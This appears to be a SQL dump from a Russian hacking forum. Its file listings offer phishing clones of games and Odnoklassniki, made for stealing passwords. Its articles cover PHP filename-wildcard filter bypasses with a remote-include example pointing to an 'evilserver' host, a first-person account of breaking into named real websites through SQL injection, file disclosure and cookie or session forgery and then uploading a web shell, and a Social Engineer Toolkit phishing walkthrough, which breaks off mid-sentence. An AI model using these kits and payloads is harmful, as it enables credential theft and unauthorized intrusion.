INSERT INTO fo_files VALUES("16","files/836637794_Ok.zip","1426420998","0","1","Фейк Одноклассники","Автор NecroPoliss","0","0","14","78");
INSERT INTO fo_files VALUES("17","files/946617797_Mobitva.zip","1426421051","0","1","Фейк mobitva.ru","Автор NecroPolis","0","0","14","78");
INSERT INTO fo_files VALUES("18","files/28761feik_greatraces.zip","1426421096","0","1","Фейк greatraces.mobi","Установка:<br />залейте скрипт в корень и все. Пароли в hardcore.txt. <br />","0","0","14","78");
INSERT INTO fo_files VALUES("19","files/44677naemniki.mobi.zip","1426421136","0","1","Фейк naemniki.mobi","************************<br />Разработчик: Xlam<br />************************<br />1)Распаковать архив.<br />2)Пароли хранятся в log.txt<br />************************<br />Уважайте права АВТОРА.<br />************************","0","0","14","78");
INSERT INTO fo_files VALUES("20","files/43671xaos.mobi.zip","1426421178","0","1","Фейк xaos.mobi","************************<br />Разработчик: Xlam<br />************************<br />1)Распаковать архив.<br />2)Пароли хранятся в log.txt<br />************************<br />Уважайте права АВТОРА.","0","0","14","78");
INSERT INTO fo_files VALUES("26","files/12824tiwar feik.zip","1426421542","0","1","Фейк Битвы титанов","Фейк не мой но я его переработал<br />Пароль от архива:1111<br />Пароли хранятся в database.txt<br />By WaylandeR<br />","0","0","14","78");
INSERT INTO fo_files VALUES("23","files/69641mrush.rar","1426421314","0","1","Фейк разрушителей","меняем пароль в log.html","0","0","14","78");
INSERT INTO fo_files VALUES("27","files/37862intern feik.zip","1426421582","0","1","interny","Фейк:<br />Интерны простой<br />Пароль от архива:1111<br />Автор:WaylandeR<br />","0","0","14","78");
INSERT INTO fo_files VALUES("35","files/archive/13246Mask_Surf_Pro_3.6.rar","1426422258","0","1","Mask Surf Pro 3.6","Mask Surf Pro - это простая в использовании программа для анонимного серфинга, основанная на технологии The Onion Router (Tor). Mask Surf Pro использует в своей работе сеть распределенных серверов Tor, призванных обеспечить анонимный обмен информацией в Интернет, тем самым предоставляя бескомпромиссный уровень защиты вашей информации. Это идеальное решение для опытных пользователей, которые желают контролировать все аспекты своей анонимности в сети Интернет.","0","0","14","82");
INSERT INTO fo_files VALUES("36","files/archive/81275antiddos.rar","1426435854","0","1","Хороший антиддос","Хорошая защита вашего сайта от ддос атак","0","0","14","75");
INSERT INTO fo_files VALUES("32","files/92522Feik_Vikingi.zip","1426421741","0","1","фейк игры викинги","Неплохой фейк игры викинги","0","0","14","78");
INSERT INTO fo_files VALUES("33","files/41894Feik_Angeli_demoni.zip","1426421773","0","1","фейк игры Война ангелы демоны","Установка внутри","0","0","14","78");
INSERT INTO fo_files VALUES("34","files/54054klubrace.zip","1426421821","0","1","Новые Гонки фейк","Хороший фейк для кражи паролей))","0","0","14","78");
DROP TABLE IF EXISTS `fo_komm`;
CREATE TABLE `fo_komm` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
`msg` text NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
INSERT INTO fo_komm VALUES("1","27","36","реадми есть?","1426436541");
INSERT INTO fo_komm VALUES("2","21","35","А не легче напрямую через браузер Tor?","1426506113");
INSERT INTO fo_komm VALUES("3","72","33","я делал)","1426921132");
INSERT INTO fo_komm VALUES("4","72","32","тож мой)","1426921162");
DROP TABLE IF EXISTS `fo_pod`;
CREATE TABLE `fo_pod` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`cid` int(11) NOT NULL DEFAULT '0',
`title` char(50) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=86 DEFAULT CHARSET=utf8;
INSERT INTO fo_pod VALUES("85","14","Сканеры");
INSERT INTO fo_pod VALUES("84","14","Стиллеры");
INSERT INTO fo_pod VALUES("83","14","Кейлоггеры");
INSERT INTO fo_pod VALUES("82","14","Анонимность (Подмена, Скрытые Ip)");
INSERT INTO fo_pod VALUES("81","14","DDoS (HTTP, UDP, TCP)");
INSERT INTO fo_pod VALUES("80","14","Shell скрипты");
INSERT INTO fo_pod VALUES("79","14","Вирусы");
INSERT INTO fo_pod VALUES("78","14","Фейки");
INSERT INTO fo_pod VALUES("77","14","Словари");
INSERT INTO fo_pod VALUES("76","14","Брутфорсеры");
INSERT INTO fo_pod VALUES("75","14","Софт/Программы");
DROP TABLE IF EXISTS `friends`;
CREATE TABLE `friends` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`who` int(11) NOT NULL DEFAULT '0',
`zajavka` smallint(2) NOT NULL DEFAULT '0',
`group` char(15) NOT NULL,
`friendtext` char(50) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;
INSERT INTO friends VALUES("2","39","1","1","","");
INSERT INTO friends VALUES("3","1","39","1","","");
INSERT INTO friends VALUES("5","27","39","1","","");
INSERT INTO friends VALUES("6","39","27","1","","");
INSERT INTO friends VALUES("8","39","30","1","","");
INSERT INTO friends VALUES("9","30","39","1","","");
INSERT INTO friends VALUES("11","101","94","1","","");
INSERT INTO friends VALUES("12","94","101","1","","");
DROP TABLE IF EXISTS `gazeta_article`;
CREATE TABLE `gazeta_article` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`uid` int(11) NOT NULL DEFAULT '0',
`content` text NOT NULL,
`name` text NOT NULL,
`path` char(50) NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
`author` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=174 DEFAULT CHARSET=utf8;
INSERT INTO gazeta_article VALUES("69","22","Какой-нибудь год назад все просто с ума сходили от Error-based MySQL, а unserialize казался чем-то сложным и не встречающимся в реальной жизни. Теперь это уже классические техники. Что уж говорить о таких динозаврах как нуль-байт в инклудах, на смену которому пришел file name truncated. Исследователи постоянно что-то раскапывают, придумывают, а тем временем уже выходят новые версии интерпретаторов, движков, а с ними – новые баги разработчиков.<br /> По сути, есть три метода найти уязвимость: смекалка (когда исследователь придумывает какой-нибудь трюк и проверяет, работает ли он на практике), анализ исходного кода и фаззинг. Об одном интересном китайском фаззинге и его развитии с моей стороны я и хочу рассказать. <br />Fuzzing — это не только ценный мех...<br />Началось все с того, что Гугл распорядился выдачей уже не помню на какой запрос и показал сайт на китайском языке: http://code.google.com/p/pasc2at/wiki/SimplifiedChinese, где было собрано множество интересных находок китайских фаззеров. Интересно, что в списке были совсем свежие находки, которые только-только публиковались в статьях. Среди них нашелся и привлекший мое внимание код следующего содержания:<br /><?php<br />for($i=0;$i<255;$i++) {<br /> $url = '1.ph'.chr($i);<br /> $tmp = @file_get_contents($url);<br /> if(!empty($tmp)) echo chr($i)."\r\n";<br />} <br />?><br /><br />Привлек он меня потому, что смысла я не понял, но разобрал в описании знакомые символы «win32» :). Переводить китайскую письменность было странным развлечением даже с помощью google.translate, поэтому я тупо выполнил этот код под виндой и посмотрел на результат. Каково же было мое удивление, когда обнаружилось, что у файла в винде существовали как минимум 4 имени: 1.phP, 1.php, 1.ph>, 1.ph<. Теперь уже китайская письменность не казалась мне такой далекой, и переводчик Гугла помог понять ее смысл. Собственно, в этом самом «смысле» не было ничего больше, чем описание кода и результата его работы. Не то чтобы не густо — вообще никак! Такое положение дел меня не устраивало. До сих пор не понимаю этих китайцев — неужели им не интересно было понять, какие функции еще уязвимы, какие особенности у этого бага при эксплуатации, а конце концов, почему это вообще работает?<br />Требую продолжения банкета!<br /> Первым делом я добавил второй итератор и запустил код с фаззингом уже по двум последним байтам. Результаты были непредсказуемы:<br />1.p<0 (нуль-байт на конце)<br />1.p< (пробел на конце)<br />1.p<"<br />1.p<.<br />1.p<<<br />1.p>><br />1.p<><br />1.p><<br />1.p<(p/P)<br />1.p>(p/P)<br />1.p(h/H)<<br />1.p(h/H)><br />1.p(h/H)(p/P)<br /><br />Отсюда явно проглядывались закономерности — на конце имени файла могли идти символы: точка, двойная кавычка, пробел, нуль-байт. Чтобы проверить эту догадку, я запустил следующий код:<br /><?php<br />if (file_get_contents("test.php".str_repeat("\"",10).str_repeat(" ",10).str_repeat(".",10))) echo 1337;<br />?><br />Как нетрудно догадаться, он вернул 1337, то есть все работало так, как и было предсказано. Это само по себе было уже расширение по символам популярной уязвимости, альтернативы нуль-байту в инклудах. После продолжения издевательств над интерпретатором были найдены конструкции имени файла со слэшами на концах, которые тоже читались без проблем:<br />file\./.\.<br />file////.<br />file\\\.<br />file\\.//\/\/\/.<br />Думаю, здесь все ясно: если использовать слэши после имени файла, то на конце всегда должна стоять точка. При этом слэши можно миксовать, и между ними можно втыкать одну точку.<br /> При всем при этом оставалось неясным главное — что скрывают символы < и >? <br />Великий и могучий WINAPI:<br />Как мне быстро стало понятно, фаззингом природу этой ошибки не поймешь. Оставалось два варианта: смотреть сорцы или трассировать вызовы. Оба эти метода довольно быстро указали на одно и то же — вызов функции FindFirstFile. При этом в стеке вызов проходил уже с заменой символа > на ?, а < на *, двойная кавычка же заменялась на точку. Также очень весело было замечать, что, несмотря на замену, < не всегда работала как * в маске файла, а вот << всегда хорошо отрабатывала. При этом в стеке оба вызова были совершенно одинаковые, но давали разный результат (см. рисунок). Теперь стало полностью ясно, откуда растут ноги. И ноги действительно росли из Ж под именем MS.<br />Польза MSDN:<br />Теперь оставалось понять, является ли такое поведение функции FindFirstFile нормальным, или же здесь имеет место баг. Искать ответ на этот вопрос я начал с документации: msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx.<br /> В самой документации ничего не говорилось насчет символов > < ", зато вот в комментариях…<br />Bug?!<br /> The characters of '<' and '>' are treated like wildcard by this function.<br />[MSFT] — these are listed in the Naming A File topic as illegal characters in path and file names. That topic is being updated to make this clearer.<br /> History<br /><br /> 10/19/2007<br /> xMartian <br /><br /> 5/2/2008<br /> Mark Amos — MSFT<br /><br />То есть об этом баге было известно еще в 2007 году! А ответ производителя вообще потрясал своим содержанием… Без комментариев :). На этом, вроде бы, стала окончательно ясна причина такого поведения PHP. Можно было приступать к расширению области применения данного бага. Перепробовав различные варианты, перечитав кучу документации (MSDN и правда очень полезен) и опробовав сотни идей, я выявил ряд правил, которые работают для файловых имен в WIN-системах. Причем баг в FindFirstFile способствует только первым четырем из них (нулевой пункт не считаем). Также, забегая вперед, скажу, что уязвимость касается не только функции file_get_contents:<br />Символы * и? не работают в именах файлов при вызове FindFirstFile через PHP (фильтруются).<br />Символ < заменяется при вызове FindFirstFile на *, то есть маску любого количества любых символов. При этом были найдены случаи, когда это работает некорректно (см. картинку). Для гарантированной маски * следует использовать <<. <br />Пример: include('shell<') подключит файл shell*, причем если под маску попадет более одного файла, то подключится тот, который идет раньше по алфавиту.<br />Символ > заменяется при вызове FindFirstFile на ?, то есть один любой символ.<br />Пример: include('shell.p>p') подключит файл shell.p?p, причем если под маску попадет более одного файла, то подключится тот, который идет раньше по алфавиту.<br />Символ " заменяется при вызове FindFirstFile на точку. <br />Пример: include('shell«php') эквивалентно include('shell.php').<br />Если первый символ в имени файла точка, то прочитать файл можно по имени без учета этой точки.<br />Пример: fopen(»htaccess") эквивалентно fopen(".htaccess"), а более навороченно, с использованием п.1,fopen(«h<<»). Так как в имени файла вторая буква «а», то по алфавиту он, скорее всего, будет первым.<br />В конце имен файлов можно использовать последовательности из слэшей одного или разного вида (прямой и обратный), между которыми можно ставить одну точку, причем в конце всегда должна стоять точка, и не ", а настоящая. <br />Пример: fopen("")<br />Можно использовать сетевые имена, начинающиеся с \\, за которыми идет любой символ, кроме точки. Это очевидно и было известно всем давно. Дополню лишь, что если сетевое имя не существует, то на операцию с файлом уходят лишние 4 секунды, что способствует истечению времени и ошибке max_execution_time (смотри статью «Гюльчатай, открой личико»). Также это позволяет обходить allow_url_fopen=Off и делать RFI.<br />Пример: include('\\evilserver\shell.php')<br />Можно использовать расширенные имена, начинающиеся с \\.\, что дает возможность переключаться между дисками в имени файла.<br />Пример: include('\\.\C:\my\file.php\..\..\..\D:\anotherfile.php').<br />Можно использовать альтернативный синтаксис имени диска для обхода фильтрации слэшей.<br />Пример: file_get_contents('C:boot.ini') эквивалентно file_get_contents('C:/boot.ini')<br />Можно использовать короткие DOS-совместимые имена файлов и директорий. Это боян, не спорю. Но обращаю твое внимание, что если в директории находится более четырех файлов, имена которых короче трех символов, то такие имена будут дополнены четырьмя хекс-символами. Аналогично будет изменено имя файла, если в директории находятся более четырех файлов, чьи имена начинаются с тех же двух первых букв.<br />Цитата: <br />Specifically, if more than four files use the same six-character root, additional file names are created by combining the first two characters of the file name with a four-character hash code and then appending a unique designator. A directory could have files named MYFAVO~1.DOC, MYFAVO~2.DOC, MYFAVO~3.DOC, and MYFAVO~4.DOC. Additional files with this root could be named MY3140~1.DOC, MY40C7~1.DOC, and MYEACC~1.DOC.<br />Пример: in.conf имеет DOS имя IND763~1.CON, то есть его можно прочитать строчкой file_get_contents('<<D763<<'), в которой вообще не содержится ни байта из настоящего имени файла! Как считаются эти четыре хекс-символа нигде не сказано, но они, кажется, зависят только от имени файла.<br />В PHP под окружением командной строки (не mod_php, а php.exe) работает специфика файлов с зарезервированными именами aux, con, prn, com1-9, lpt1-9. <br />Пример: file_get_contents('C:/tmp/con.jpg') будет бесконечно читать из устройства CON нуль-байты, ожидая EOF.<br />Пример: file_put_contents('C:/tmp/con.jpg',chr(0x07)) пискнет динамиком сервера (музыка :)).<br /><br />Советую вырезать все пункты и повесить в рамочку на видное место. Лишним не будет :).<br /><br />Играем в считалочку<br />Поверить китайскому в подписи под фаззингом о том, что уязвимость касается только file_get_contents, я просто не мог, хотя бы потому, что немного помнил исходники PHP. Недолго думая, я проверил все функции, которые вспомнил касательно работы с файлами. Результаты оказались более чем положительные.<br /> Уязвимость присутствует в функциях:<br />fopen<br />file_get_contents<br />copy<br />parse_ini_file<br />readfile<br />file_put_contents<br />mkdir<br />tempnam<br />touch<br />move_uploaded_file<br />include(_once)<br />require(_once)<br />ZipArchive::open()<br /><br />Не присутствует в:<br />rename<br />unlink<br />rmdir<br />Есть где разгуляться, не правда ли? Но это еще полбеды.<br />PoC: идеи использования<br /> Очевидно, что данную уязвимость можно использовать для обхода все возможных фильтров и ограничений. Например, для файла .htaccess, альтернативное имя будет h<< (см. п.4, п.1). Двухсимвольные файлы вообще можно читать без имени (см. п.9.). Ну и так далее. Есть и другое, не менее интересное применение — определение имен папок и файлов.<br /> Рассмотрим пример:<br /><?php<br />file_get_contents("/images/".$_GET['a'].".jpg");<br />?><br /><br />С помощью такого кода можно очень просто получить список директорий веб-сервера.<br /> Посылаем запрос test.php?a=../a<%00 и получаем ответ вида<br />Warning: include(/images/../a<) [function.include]: failed to open stream: Invalid argument in ...<br /><br />или<br />Warning: include(/images/../a<) [function.include]: failed to open stream: Permission denied ...<br /><br />В первом случае сервер не нашел ни одной директории начинающейся с буквы «а» в корне, во втором — нашел.<br /> Далее можно запустить подбор второй буквы и так далее. Для ускорения можно воспользоваться фонетикой (см. статью «Быстрее, выше и снова быстрее. Революционные подходы к эксплуатации SQL-инъекций»). Работает старая добрая техника эксплуатации слепых SQL инъекций.<br /> В ходе проведения опытов было замечено, что иногда сервер сразу выдает найденный путь в сообщении об ошибке. Тогда подбирать придется только в случае, если директории начинаются с одного и того же символа. От чего зависит вывод ошибки, я так и не успел разобраться и оставляю на суд общественности.<br />Лирическое отступление:<br /> Отрадно заметить, что репорт у китайцев нашел и Маг, который опубликовал ее в числе прочих в статье «Малоизвестные способы атак на web-приложения» еще 19 апреля, но пояснения и акцента на этой уязвимости там не было, был только китайский пример, с которого я и начинал.<br />Мораль:<br /> Честно говоря, очень хотелось найти альтернативу нуль-байту, но тщетно. Зато данная уязвимость открывает простор для других, не менее интересных атак. По сути, предоставляя возможности поиска директории и файлов через функции работы с файлами. Это само по себе уникальное явление. Как бы там ни было, респект китайцам с их фаззингом, но призываю и их, и всех остальных исследовать сырые данные, получаемые таким образом. Фаззинг фаззингом, а думать надо головой.<br />","Новые уязвимости доступа к файлам в PHP","gazeta/img_852254.jpeg","1373183177","1");
INSERT INTO gazeta_article VALUES("78","22","[Интро]<br />В этой статье я покажу, какие нелепые ошибки допускают криворукие администраторы на примере взлома нескольких сайтов. Я не буду уделять большого внимания стандартным багам – на этот раз рассмотрим уязвимости, связанные с методами авторизации. Статья писалась для людей, имеющих определенные знания в программировании на языке PHP, однако понять каким образом я обхожу авторизацию в том или ином случае может понять каждый – постарался описать подробно. Итак, начнем с самого простого и часто встречающегося случая. <br /> www.3p-consulting.info<br />На главной странице сайта была лишь одна форма для входа пользователей; это говорило только об одном – сайт предназначался для узкого круга лиц (впоследствии оказалось, что он принадлежал авторам книги о болезнях сердца). Мне ничего больше не оставалось, как попробовать систему авторизации на баги. В данном случае единственным возможным вариантом попасть в админку оказался SQL-Injection. Честно сказать я не рассчитывал попасть в приватную зону простыми способами, однако указав в качестве логина значение admin’ OR 1=1/*, я, к своему удивлению, оказался админом на сервере. «Почему так произошло?» наверняка спросишь ты. Давай рассмотрим скрипт login.php, в который методом POST передаются все параметры.<br /><?php<br /> session_start();<br /><br /> define('_VALID_INC',1);<br /><br /> ini_set('url_rewriter.tags', '');<br /><br /> include('db.class.php');<br /> include('functions.php');<br /><br /> if(isset($_SESSION['userid'])){<br /> $dif = getDif($_SESSION['start'],time(),'second',1);<br /> if($dif>=TIME_OUT){<br /> logout($_SESSION['userid']);<br /> }else{<br /> $_SESSION['start'] = time();<br /> }<br /> }<br /><br /> $act = $_REQUEST['action'];<br /> $task = $_REQUEST['task'];<br /> <br /> switch($act){<br /> case 'login':<br /> $name = strip_tags($_REQUEST['name']);<br /> $pwd = strip_tags($_REQUEST['pwd']);<br /> $login_msg = login($name,$pwd);<br /> break;<br /> case 'logout':<br /> logout($_SESSION['userid']);<br /> break;<br /> default:<br /> break;<br /> }<br /> <br />?><br /> Как видно, скрипт инклудит functions.php, в котором хранятся все необходимые функции, в том числе login(), которая возвращает в переменную $login_msg, результат выполнения авторизации. Итак, давай обратимся к этой функции. <br />function login($user,$pass){<br /> global $database;<br /> session_start();<br /><br /> if(empty($user) II empty($pass)){<br /> return (empty($user) ? 'Please enter your username.':'Please enter your password.');<br /> die();<br /> }<br /><br /> $query = $database->query("SELECT * FROM user WHERE username='".$user."' && pass='".md5($pass.MD5_PASS)."'");<br /> $erg = mysql_fetch_object($query);<br />…<br />}<br /> Вот и ответ на твой вопрос: скрипт вообще не фильтрует передаваемые значения, поэтому мы можем внедрить свой код в SQL-запрос. То есть в нашем случае получается <br />SELECT * FROM user WHERE username='admin’ OR 1=1/*<br />' && pass='".md5($pass.MD5_PASS)."'"<br /> В итоге получаем панель администрирования, не зная пароля :) Но это разминка, идем дальше. <br /> www.uvm.edu/~pepa/<br />Определить, где находилась админка, не составило труда – она была в стандартной директории /admin. Открыв ее, я на мгновение увидел что-то похожее на содержимое панели администрирования, но затем появилась форма для ввода логина и пароля. Сначала я подумал, что у меня разыгралось воображение (глюки иными словами :)), однако детально изучив html-код страницы, я убедился в том, что мое сознание в порядке. Я обратил внимание на следующую строку: <br /><meta http-equiv='refresh' content='0;url=login.php'><br /> Как не сложно догадаться в этом и заключался баг – страница просто-напросто редиректилась на скрипт login.php, который судя по всему, проверял значения cookies, причем делала она это с некоторым запозданием, несмотря на интервал времени равный нулю. Изврат, не правда ли? Но нам же лучше :) Все, что нужно было сделать – это вовремя остановить загрузку страницы, до того, как она станет редиректиться. На моем диалапе сделать это было проще простого. В итоге, я получил доступ к админке и впоследствии залил на сервер свой web-шелл. <br /> www.uvm.edu/~uvmsga/<br />Еще один сайт-неудачник находился на все том же www.uvm.edu. На этот раз сперва я нашел баг, позволявший смотреть локальные файлы, а затем напоролся на админку. Уязвимость заключалась в параметре filename скрипта download.php. Далее я решил с помощью нее получить содержание страниц, отвечающих за авторизацию: <br />http://www.uvm.edu/~uvmsga/download.php?filename=../admin/adm_logincheck.php<br /> Получил следующее: <br /><!--- login_check.php ---><br /><html><br /><head><br /><?php<br />if (isset($username))<br />{<br /> include("common_db.php");<br /> $link_id = db_connect();<br /> if($link_id)<br /> {<br /> $continue = mysql_select_db($dbname); <br /> if($continue)<br /> { <br /> $result = mysql_query("SELECT * FROM SGA_COMMITTEE_ROSTER WHERE UPPER(USERNAME) = UPPER('$username') AND UPPER(PASSWORD) = UPPER('$password')"); <br /> if($result) <br /> {<br /> for($m=0; $m window.location.href='adm_setsession.php?sUID=$intID' </script></head>";<br /> }<br /> if(!isset($intID))<br /> echo "</head><body> <p align='center'> Invalid Login - click Back to try again. </body>";<br /> } // if result<br /> else<br /> echo "<script> window.location.href='index.php' </script></head>";<br /> }<br /> else<br /> echo "<script> window.location.href='index.php' </script></head>";<br /> }<br /> else<br /> echo "<script> window.location.href='index.php' </script></head>";<br />} // if set username<br />else<br /> echo "<script> window.location.href='index.php' </script></head>";<br />?><br /></html><br /> Я уверен, что ты уже сам догадался, в чем суть уязвимости. Для тех, кто не понял, объясняю: скрипт подключается к базе данных, затем извлекает информацию, сравнивает с переданными значениями и в случае неверного логина и пароля возвращает ошибку. Однако давай посмотрим, что делает скрипт при указании пользователем валидных данных: <br />echo "<script> window.location.href='adm_setsession.php?sUID=$intID' </script></head>";<br /> Это значит, что скрипт предает полученное из БД значение $intID в adm_setsession.php, который, в свою очередь, в соответствии с ним выставляет сессию. Но что нам мешает прямо перейти на adm_setsession.php и указать в качестве sUID свое значение, к примеру 1, которое принадлежит админу. Перейдя по адресу http://www.uvm.edu/~uvmsga/admin/ adm_setsession.php?sUID=1, я, как и ожидал, попал в админку. Вуаля! <br /> www.icc-portugal.com<br />На этот раз под мой прицел попал португальский сайт. Нашел я его с помощью гугла, точнее, с помощью специально составленного запроса поисковик выдал мне уязвимый скрипт на этом сайте. Как и в предыдущем случае у меня была возможность просмотра локальных файлов. Не долго думая, я снова решил получить содержание скриптов, находящихся в папке /admin, а именно login.inc.php: <br />http://www.icc-portugal.com/download.php?filename=/usr/www/users/nb2020/icc/includes/login.inc.php<br />Вот кусок этого файла: <br /><?php<br /> if (isset($_COOKIE['adminuser'])) {<br /> $httpuser=$_COOKIE['adminuser'];<br /> <br /> } else {<br /> $page='login';<br /> if (isset($_POST['password']) && isset($_POST['username'])) {<br /> include("connect_db.inc.php");<br /> $httpuser=false;<br /> $postuser = strtolower($_POST['username']);<br /> $postpasswd = strtolower($_POST['password']);<br /> $query_admin = mysql_query("SELECT LOWER(admin_login),LOWER(admin_passwd)<br /> FROM admin <br /> WHERE admin_login = LOWER('$postuser')<br /> AND admin_passwd = LOWER('$postpasswd')") or die("kuk2");<br /> if (mysql_num_rows($query_admin) != "0") {<br /> $httpuser=strtolower($_POST['username']);<br /> setcookie('adminuser',$httpuser,time()+3600,'/');<br /> header("Location:".$_SERVER['PHP_SELF']);<br /> exit();<br /> } else {<br /> $page='login_error';<br /> }<br /> }<br />?><br /> На мой взгляд, админу, который создал сие творение, необходимо оторвать руки :) На самом деле проверка идет не на наличие верного пароля, а на наличие параметра adminuser в кукисах. Поэтому для удачной авторизации нужно всего лишь записать в cookies строку adminuser=admin. Хотя в принципе можно указать вовсе не настоящий логин админа, а все, что угодно, так как скрипт проверяет только факт существования кукисов. Подправив значения cookies во встроенном редакторе Оперы, я попытался залогиниться в админку. В итоге, я снова получил панель администрирования благодаря тупоголовости «веб-мастеров».<br /><br />Заключение:<br />Вот такие, оказывается, бывают ошибки. Поэтому мой совет всем веб-мастерам – перед созданием самой админки уделяйте особое внимание авторизации. Ведь, как показывает практика, очень часто ее легко обойти. Что касается судьбы взломанных мною сайтов, то ничего злонамеренного с ними совершать я не стал. На этом прощаюсь. Удачи!","Обходим системы авторизации","gazeta/img_413383.png","1373278459","3");
INSERT INTO gazeta_article VALUES("70","22","Постепенно человеческие чувства, эмоции, отношения, да и жизнь в целом все больше и больше переносятся в мир компьютеров, в мир глобальных сетей, в мир нулей и единиц. Этот мир живет по своим правилам. Правилам, которые меняются каждый день, и незнание которых приводит к печальным последствиям. Самое ценное здесь — это знание, самое мощное оружие здесь — это знание. Мы сами создали этот мир. Мы сами рвемся в него с головой... вместе с нашими vulnerability...<br /> Introduction<br />Человек — самое слабое звено в системе — это уже давно известно. Человек непостоянен, а поступки его предсказуемы. Его действия порой необоснованны и не подчиняются никакой логике. Слабость системы можно закрыть патчем раз и навсегда, слабость человека — нет. Как результат — неограниченный простор для фантазии, цель которой — доступ к системе, и дорога, к которой идет через километры проводов и радиоволн, а на входе стоит человек. О том, благодаря каким изъянам человека можно проникнуть внутрь, читай в рубрике "PSYCHO", а я расскажу об инструменте, которой поможет сделать эту дорогу более простой и комфортной.<br /> It is beatiful S.E.T.<br />Так перейдем от слов к делу. А поможет нам в этом Social Engineer Toolkit (SET), написанный специалистом по безопасности David Kennedy (ReL1K), распространяющим его под лицензией GPLv2. Данный toolkit достаточно недавно появился на свет, но сразу обрел популярность и был включен в BackTrack, на котором мы и будем производить все манипуляции. Для начала обновим (установим) SET следующей командой:<br /><br />svn co http://svn.thepentest.com/social_engineering_toolkit /pentest/exploits/SET<br /><br />Прелесть SET заключается в том, что он написан на Python и при этом не требует никаких сторонних питоновских модулей, которые бы пришлось устанавливать дополнительно. Работа ведется через интерактивное меню, где лишь необходимо выбирать желаемые пункты работы приложения. На каждом шаге меню сопровождается хорошим описанием предлагаемых подпунктов, так что справится даже ребенок (тут становится немного страшно :)). Для своей работы, помимо интерпретатора Python, SET использует много сторонних проектов, которые уже есть в составе дистрибутива: Metasploit, ettercap, sendmail, apache и др. Можно, конечно, обойтись и без них, но функционал программы намного уменьшится. SET невидимо для пользователя использует сторонние программы, не вовлекая его в премудрости настройки последних. Но сам toolkit оттюнинговать в некоторых ситуациях просто необходимо, и для этого придется обратиться к файлу настроек:<br /><br />/pentest/exploits/SET/config/set_config<br /><br />В set_config по большей части находятся настройки, которые отвечают за взаимодействие SET и сторонних программ (и их поведения). Не стоит забывать, что это проект open-source, и в нем всегда можно поразбираться, что-то добавить (0-day например), улучшить и подправить. Но давай перейдем к рассмотрению арсенала SET, ведь именно это тебе не терпится сделать.<br /><br />Итак, SET предоставляет собой функционал для проведения четырех основных векторов атаки:<br /><br />Основные вектора атаки SET<br />E-MAIL ATTACK VECTOR<br />WEB ATTACK VECTOR<br />CD/DVD/USB ATTACK VECTOR<br />Teensy USB HID ATTACK VECTOR<br /><br />При проведении атаки через е-mail используются эксплойты, реализующие уязвимости типа file format, такие как:<br />Adobe Flash Player 'newfunction' Invalid Pointer Use<br />Adobe Collab.collectEmailInfo Buffer Overflow<br />Adobe Collab.getIcon Buffer Overflow<br />Adobe JBIG2Decode Memory Corruption Exploit<br />Adobe PDF Embedded EXE Social Engineering<br />и другие<br /><br />А при атаке через веб-вектор, как это ни удивительно, эксплойты, реализующие уязвимости в браузерах:<br />LNK Code Execution (MS10-046)<br />Help Center XSS and Command Execution (MS10-042)<br />IE iepeers.dll Use After Free (MS10-018)<br />IE Tabular Data Control Exploit (MS10-018)<br />IE "Aurora" Memory Corruption (MS10-002)<br />и другие<br /><br />Надежность каждого эксплойта равна его надежности из metasploit, как раз в этом моменте и происходит взаимодействие SET и metasploit. Автор SET не пишет своих эксплойтов, а просто позволяет получить доступ к проверенным и хорошо зарекомендовавшим себя эксплойтам в Metasploit. А теперь давай поподробней остановимся на каждом из векторов атак и посмотрим, какие атаки они несут на самом деле, и как можно воспользоваться этим на практике...<br /> E-mail attack vector<br /><br />Начнем наше путешествие с email-вектора атаки. Для этого в главном меню выберем пункт "Spear-Phishing Attack Vectors". В наше время сложно представить человека без электронной почты, а без соблазна получить что-нибудь на халяву — еще сложней. А когда халява сама приходит тебе на электронный ящик — это вообще не жизнь, а сказка. Для начала нужно определиться с количеством целей, ведь SET предоставляет два режима рассылки:<br />Индивидуальная рассылка<br />Массовая рассылка<br /><br />Для массовой рассылки необходим заранее сформированный файл со списком целевых адресов. Формат данного файла очень прост — один адрес на строку, и находится он в /pentest/exploits/SET/config/mailing_list.txt. А так все сродни написанию обычного письма — необходимо заполнить тему письма и его содержание. В принципе, чтобы каждый раз не повторять один и тот же ввод, можно сделать шаблон и в дальнейшем использовать его при необходимости. Что касается отправки письма, то тут есть три варианта:<br />Gmail-аккаунт<br />Свой Sendmail open-relay<br />Чей-то open-relay сервер<br /><br />Как видишь, есть варианты на любой вкус: можно отправить письмо через свой Gmail-аккаунт, не выходя из SET, воспользоваться Sendmail-сервером, который будет автоматически поднят SET на BackTrack, и слать через него, либо заранее найти open-relay в интернете. Чтобы определить, является ли SMTP-сервер open-relay, можно воспользоваться готовым NSE-скриптом Nmap:<br /><br />nmap --script smtp-open-relay.nse <host><br /><br />Благодаря оpen-relay можно отсылать письма с чужих адресов, но не стоит забывать, что у жертвы может использоваться механизм "reverse lookups", который способен определить соответствие доменного имени отправителя письма.<br /><br />Боевая нагрузка (Meterpreter Reverse_TCP, Reverse VNC, Reverse TCP Shell) вместе с эксплойтом прозрачно выбираются из metasploit и идут внутри присоединенного к письму PDF-файла, который может быть как заготовкой SET, так и любым твоим PDF-вложением. Остается поднять listener и ждать, пока человеческий фактор сыграет злую шутку.<br /><br />Social Engineering CT<br /><br />Данное событие впервые произошло не так давно, а именно — на DEFCON 18 в Riviera Hotel & Casino в Las Vegas, штат Nevada. Организаторами этого состязания были Social-Engineer.Org и Offensive Security. Всем участникам были розданы целевые компании, информацию о которых им необходимо было добыть, используя свои навыки в области социальной инженерии, и только законными способами. При этом участникам запрещалось выдавать себя за работников государственных учреждений, правоохранительных органов или юридических лиц, а также нельзя было связываться с родственниками сотрудников компаний. А задачей участников был, как и в любом CTF, захват флагов, но только 